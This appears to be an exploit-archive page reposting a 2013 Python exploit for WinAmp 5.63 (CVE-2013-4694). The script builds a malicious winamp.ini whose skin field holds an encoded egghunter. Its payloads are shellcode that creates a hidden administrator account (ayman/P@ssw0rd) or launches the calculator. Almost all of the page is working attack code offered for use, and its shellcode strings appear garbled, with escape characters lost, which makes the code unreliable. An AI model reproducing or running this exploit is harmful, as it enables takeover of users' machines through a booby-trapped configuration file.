Home / exploitsPDF  

WinAmp 5.63 winamp.ini Local Exploit

Posted on 27 August 2013

<pre># Exploit Title: winampevilskin.py # Date: 25 August 2013 # Exploit Author: Ayman Sagy &lt;aymansagy@gmail.com&gt; # Vendor Homepage: http://www.winamp.com/ # Version: 5.63 # Tested on: Windows XP Professional SP3 Version 2002 # CVE : 2013-4694 # # Ayman Sagy &lt;aymansagy@gmail.com&gt; August 2013 # # This is an exploit for Bug #1 described in http://www.exploit-db.com/exploits/26558/ # Credit for discovering the vulnerability goes to Julien Ahrens from Inshell Security # # The exploit will generate a winamp.ini file that will cause winamp to run the payload upon startup # # # I tried an alpha3 encoded egghunter but could not fit it in a single buffer and unfortunately it did not work, it wrote an invalid address on the stack then tried to access it # If you can make it work or find a solution for ASLR/DEP please contact me # # So I wrote from scratch a venetian shellcode that will write the egghunter onto the stack then executes it # The egg and shellcode can be found in plain ASCII in memory # # Tested against Windows XP Pro SP3 # Note: If you add winamp as an exception to DEP the return address becomes 0x003100F0 instead of 0x003000F0 # run with Python 2.7 import sys, getopt, os def usage(): print('winampevilskin.py by Ayman Sagy &lt;aymansagy@gmail.com&gt; ') print('Usage: python ' + sys.argv[0] + ' -p &lt;payload&gt;') print('Payload could be:') print(' [user] to create new admin account ayman/P@ssw0rd') print(' [calc] run calculator') print('for e.g.: python ' + sys.argv[0] + ' -p user') #appdata = os.environ['APPDATA'] # Windows add admin user: ayman P@ssw0rd scadduser = ( b&quot;xbfxabxd0x9ax5bxdaxc7xd9x74x24xf4x5ax2bxc9&quot; + &quot;xb1x45x83xc2x04x31x7ax11x03x7ax11xe2x5ex2c&quot; + &quot;x72xd2xa0xcdx83x85x29x28xb2x97x4dx38xe7x27&quot; + &quot;x06x6cx04xc3x4ax85x9fxa1x42xaax28x0fxb4x85&quot; + &quot;xa9xa1x78x49x69xa3x04x90xbex03x35x5bxb3x42&quot; + &quot;x72x86x3cx16x2bxccxefx87x58x90x33xa9x8ex9e&quot; + &quot;x0cxd1xabx61xf8x6bxb2xb1x51xe7xfcx29xd9xaf&quot; + &quot;xdcx48x0exacx20x02x3bx07xd3x95xedx59x1cxa4&quot; + &quot;xd1x36x23x08xdcx47x64xafx3fx32x9exd3xc2x45&quot; + &quot;x65xa9x18xc3x7bx09xeax73x5fxabx3fxe5x14xa7&quot; + &quot;xf4x61x72xa4x0bxa5x09xd0x80x48xddx50xd2x6e&quot; + &quot;xf9x39x80x0fx58xe4x67x2fxbax40xd7x95xb1x63&quot; + &quot;x0cxafx98xe9xd3x3dxa7x57xd3x3dxa7xf7xbcx0c&quot; + &quot;x2cx98xbbx90xe7xdcx34xdbxa5x75xddx82x3cxc4&quot; + &quot;x80x34xebx0bxbdxb6x19xf4x3axa6x68xf1x07x60&quot; + &quot;x81x8bx18x05xa5x38x18x0cxc6xd3x82x81x6dx54&quot; + &quot;x2exfex42xc7x90x90xf9x73xf1x19x72x19x83xc1&quot; + &quot;x15x98x0ex63xbbx7ax81x23x30x08x56x94xc4x8a&quot; + &quot;xb8xfbx69x17xfdx23x4fxb1xddx4dxeaxc9x3dxfe&quot; + &quot;x9bx52x5fx92x04xe7xf0x1fxbax27x4ex84x57x41&quot; + &quot;x3ex2dxd4xe5xccxccx6ex69x43x7cxaex14xdaxef&quot; + &quot;xcfxb8x3cxdfx4ex01x79x1f&quot; ) # http://shell-storm.org/shellcode/files/shellcode-739.php sccalc = (b&quot;x31xC9&quot;+ # xor ecx,ecx &quot;x51&quot;+ # push ecx &quot;x68x63x61x6Cx63&quot;+ # push 0x636c6163 &quot;x54&quot;+ # push dword ptr esp &quot;xB8xC7x93xC2x77&quot;+ # mov eax,0x77c293c7 &quot;xFFxD0&quot; ) if len(sys.argv) &lt; 2: usage() exit(1) try: opts, args = getopt.getopt(sys.argv[1:],'p:') except getopt.GetoptError: usage() exit(1) for opt, arg in opts: if opt == '-p': if arg == 'user': shellcode = &quot;aymnaymn&quot; + &quot;x90&quot; + &quot;x90&quot; * 100 + scadduser + &quot;x90&quot; * 89 elif arg == &quot;calc&quot;: shellcode = &quot;aymnaymn&quot; + b&quot;x90&quot; * 452 + b&quot;x90&quot; + sccalc + b&quot;x90&quot; * 23 else: print(&quot;Error: Invalid payload. &quot;) usage() sys.exit() #print(str(len(shellcode))) egghunter = (&quot;x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74&quot;+ &quot;xefxb8x61x79x6dx6ex8bxfaxafx75xeaxafx75xe7xffxe7&quot;) sploit = ( # Unicode-friendly venetian egghunter writer # Setup Registers &quot;x50x72x50&quot;+ # push eax twice &quot;x72&quot; + # align &quot;x59x72x5f&quot;+ # pop ecx pop edi &quot;x72&quot; + &quot;x05xc2x02x01&quot;+ # 05 00020001 ADD EAX,1000200 &quot;x72&quot;+ &quot;x2dxc2x01x01&quot;+ # 2D 00010001 SUB EAX,1000100 # EAX is now EAX+100 &quot;x72x48&quot;+ # dec eax 4 times &quot;x72x48&quot;+ &quot;x72x48&quot;+ &quot;x72x48x72&quot;+ # Pave Ahead # write NOPs in locations that will stop later execution &quot;xc3x86xc2x90&quot;+ # C600 90 MOV BYTE PTR DS:[EAX],90 &quot;x72x40x72&quot;+ # 40 INC EAX &quot;xc3x86xc2x90&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86xc2x90&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86xc2x90&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86xc2x90&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86xc2x90&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86xc2x90&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86xc2x90&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86xc2x90&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86xc2x90&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86xc2x90&quot;+ &quot;x72x40x72&quot;+ &quot;xc2x91&quot; # 91 XCHG EAX,ECX &quot;x72&quot; + # align # Start writing egghunter shellcode, EGG = aymn &quot;xc3x86x66&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86xc2x81&quot;+ #81 &quot;x72x40x72&quot;+ &quot;xc3x86xc3x8a&quot;+ #ca &quot;x72x40x72&quot;+ &quot;xc3x86xc3xbf&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86x0f&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86x42&quot;+ # 42 &quot;x72x40x72&quot;+ &quot;xc3x86x52&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86x6a&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86x02&quot;+ &quot;x72x40x72&quot;+ &quot;x34&quot; * 4 + # Padding &quot;xc3xb0x30&quot;+ # 0x003000F0 CALL EAX winamp.exe WinXP Pro SP3 # Note: If you add winamp as an exception to DEP the return address becomes 0x003100F0 instead of 0x003000F0 &quot;x72&quot; &quot;xc3x86x58&quot;+ #58 &quot;x72x40x72&quot;+ &quot;xc3x86xc3x8d&quot;+ #cd &quot;x72x40x72&quot;+ &quot;xc3x86x2e&quot;+ #2e &quot;x72x40x72&quot;+ &quot;xc3x86x3c&quot;+ # 3c &quot;x72x40x72&quot;+ &quot;xc3x86x05&quot;+ # 5 &quot;x72x40x72&quot;+ &quot;xc3x86x5a&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86x74&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86xc3xaf&quot;+ # ef &quot;x72x40x72&quot;+ &quot;xc3x86xc2xb8&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86x61&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86x79&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86x6d&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86x6e&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86xc2x8b&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86xc3xba&quot;+ #fa &quot;x72x40x72&quot;+ &quot;xc3x86xc2xaf&quot;+ # af &quot;x72x40x72&quot;+ &quot;xc3x86x75&quot;+ #75 &quot;x72x40x72&quot;+ &quot;xc3x86xc3xaa&quot;+ #ea &quot;x72x40x72&quot;+ &quot;xc3x86xc2xaf&quot;+ # af &quot;x72x40x72&quot;+ &quot;xc3x86x75&quot;+ #75 &quot;x72x40x72&quot;+ &quot;xc3x86xc3xa7&quot;+ # e7 &quot;x72x40x72&quot;+ &quot;xc3x86xc3xbf&quot;+ # ff &quot;x72x40x72&quot;+ &quot;xc3x86xc3xa7&quot;+ # e7 &quot;x72&quot;+ &quot;x57&quot;+ # 57 PUSH EDI &quot;x72&quot;+ # align &quot;xc3x83&quot;+ # C3 RETN &quot;x34&quot; * 200 # Padding ) winamp = (&quot;[Winamp] utf8=1 &quot; + &quot;skin=&quot; + sploit + &quot; &quot; &quot;[WinampReg] IsFirstInst=0 NeedReg=0 &quot; + &quot;[in_wm] numtypes=7 &quot; + &quot;type0=WMA description0=Windows Media Audio File (*.WMA) &quot; + &quot;protocol0=0 avtype0=0 &quot; + &quot;type1=WMV description1=Windows Media Video File (*.WMV) &quot; + &quot;protocol1=0 avtype1=1 type2=ASF &quot; + &quot;description2=Advanced Streaming Format (*.ASF) &quot; + &quot;protocol2=0 avtype2=1 type3=MMS:// &quot; + &quot;description3=Windows Media Stream protocol3=1 &quot; + &quot;avtype3=1 type4=MMSU:// &quot; &quot;description4=Windows Media Stream protocol4=1 &quot; + &quot;avtype4=1 type5=MMST:// &quot; + &quot;description5=Windows Media Stream protocol5=1 &quot; + &quot;avtype5=1 type5=&quot; + &quot;x90x90xe9x0f&quot; + &quot; description6=&quot; + shellcode + &quot; protocol6=0 avtype6=0 &quot;) #f = open(appdata + &quot;Winampwinamp.ini&quot;, &quot;wb&quot;) or sys.exit(&quot;Error creating winamp.ini&quot;) f = open(&quot;winamp.ini&quot;, &quot;wb&quot;) or sys.exit(&quot;Error creating winamp.ini&quot;) f.write(winamp) f.close() print(&quot;winamp.ini written, copy it into %APPDATA%\Winamp&quot;) </pre>

 

TOP